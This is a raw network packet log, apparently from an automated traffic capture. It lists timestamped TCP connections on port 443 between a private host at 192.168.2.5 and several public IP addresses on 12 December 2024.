Dec 12, 2024 22:40:27.553323030 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.553337097 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.553905010 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.556685925 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.560188055 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.560270071 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.560287952 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.564845085 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.565869093 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.565882921 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.567332983 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.567553997 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.567565918 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.573369980 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.573723078 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.573734999 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.583033085 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.583123922 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.583142996 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.584011078 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.584060907 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.584070921 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.589952946 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.590080976 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.590101957 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.593053102 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.593157053 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.593178988 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.599847078 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.599915028 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.599925041 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.606538057 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.606632948 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.606645107 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.608345032 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.608441114 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.608453989 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.612544060 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:27.612577915 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:27.612641096 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:27.613641977 CET	49758	443	192.168.2.5	172.217.17.78
Dec 12, 2024 22:40:27.613657951 CET	443	49758	172.217.17.78	192.168.2.5
Dec 12, 2024 22:40:27.615159988 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.615276098 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.615291119 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.626391888 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.626444101 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.626471043 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.627945900 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.628109932 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.628139019 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.628149033 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.628314972 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.634519100 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.636282921 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.636511087 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.636531115 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.639159918 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.640885115 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.641207933 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.641231060 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.643287897 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.643348932 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.643361092 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.648979902 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.649951935 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.649957895 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.649980068 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.650156975 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.651993990 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.655730009 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.656289101 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.656303883 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.658618927 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.658648014 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.659236908 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.659380913 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.659661055 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.659746885 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.660005093 CET	49753	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.660689116 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.660923958 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.660942078 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.661473989 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.662269115 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:27.662308931 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:27.662506104 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:27.662858009 CET	49759	443	192.168.2.5	172.217.19.238
Dec 12, 2024 22:40:27.662868977 CET	443	49759	172.217.19.238	192.168.2.5
Dec 12, 2024 22:40:27.664371014 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.670341969 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.670411110 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.670433044 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.674112082 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.674190044 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.674213886 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.680594921 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.680963993 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.680984020 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.684238911 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.684389114 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.684406996 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.690655947 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.690705061 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.691344976 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.691358089 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.691670895 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.693355083 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.700654030 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.700762033 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.700973988 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.701004982 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.701211929 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.703330994 CET	443	49753	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.703396082 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.711503029 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.711549044 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.711560965 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.711585999 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.712341070 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.712539911 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.719261885 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.719352007 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.719355106 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.719372034 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.719536066 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.722002029 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.727694035 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.727739096 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.727840900 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.727857113 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.728002071 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.730570078 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.736754894 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.737251997 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.737265110 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.739394903 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.739439964 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.740268946 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.740278959 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.740782976 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.744211912 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.747775078 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.748025894 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.748431921 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.748445988 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.748606920 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.756009102 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.758021116 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.758120060 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.758152962 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.761723995 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.761795044 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.761811972 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.765315056 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.765376091 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.765388012 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.768982887 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.769047976 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.769107103 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.769128084 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.769252062 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.772773027 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.773379087 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.773462057 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.773478031 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.776746035 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.776793957 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.776814938 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.780204058 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.780265093 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.780283928 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.783991098 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.784641027 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.784655094 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.787065983 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.787136078 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.787156105 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.791198969 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.791245937 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.791268110 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.793829918 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.793876886 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.793898106 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.796979904 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.797137976 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.797146082 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.800348997 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.800467014 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.800477028 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.803757906 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.803858042 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.803867102 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.806463003 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.806540966 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.806550980 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.809609890 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.810264111 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.810282946 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.812303066 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.812390089 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.812407017 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.815062046 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.815104961 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.815124989 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.818177938 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.818335056 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.818353891 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.821357965 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.821414948 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.821423054 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.823720932 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.823941946 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.823952913 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.824381113 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.826778889 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.826838017 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.827177048 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.832216024 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.832273960 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.832309008 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.833070993 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.833264112 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.833276033 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.842375040 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.842499018 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.842509031 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.842700958 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.842752934 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.842777967 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.845000029 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.845066071 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.845072985 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.858319044 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.858388901 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.858403921 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.859456062 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.859513044 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.859520912 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.860754967 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.860810995 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.860816956 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.874073029 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.874134064 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.874141932 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.874917984 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.874980927 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.874988079 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.876224041 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.876295090 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.876302004 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.886003971 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.886063099 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.886090994 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.886203051 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.886356115 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.886364937 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.888217926 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.888366938 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.888375998 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.903007030 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.903121948 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.903131008 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.904301882 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.904345036 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.904434919 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.904445887 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.904715061 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.905257940 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.914978027 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.915033102 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.915201902 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.915216923 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.915340900 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.915834904 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.922931910 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.922981024 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.923000097 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.923278093 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.923341036 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.923346996 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.923618078 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.923661947 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.923675060 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.925247908 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.925390005 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.925398111 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.937097073 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.937228918 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.937237024 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.938030958 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.938123941 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.938134909 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.950432062 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.950480938 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.950500011 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.950850010 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.950884104 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.950889111 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.950928926 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.951172113 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.951639891 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.961177111 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.961261034 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.961268902 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.961430073 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.961541891 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.961548090 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.962145090 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.962186098 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.962202072 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.988584995 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.988722086 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.988733053 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.988900900 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.988940001 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.988961935 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.989622116 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.989669085 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.989692926 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.990482092 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.990662098 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.990668058 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.991606951 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.992054939 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.992079020 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.992086887 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.992376089 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.992383957 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.993398905 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.993465900 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.993561029 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:27.993602991 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:27.993602991 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.001813889 CET	49745	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.001837015 CET	443	49745	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.105253935 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.105312109 CET	443	49765	142.250.181.132	192.168.2.5
Dec 12, 2024 22:40:28.105392933 CET	49765	443	192.168.2.5	142.250.181.132
Dec 12, 2024 22:40:28.106425047 CET	49765	443	192.168.2.5	142.250.181.132
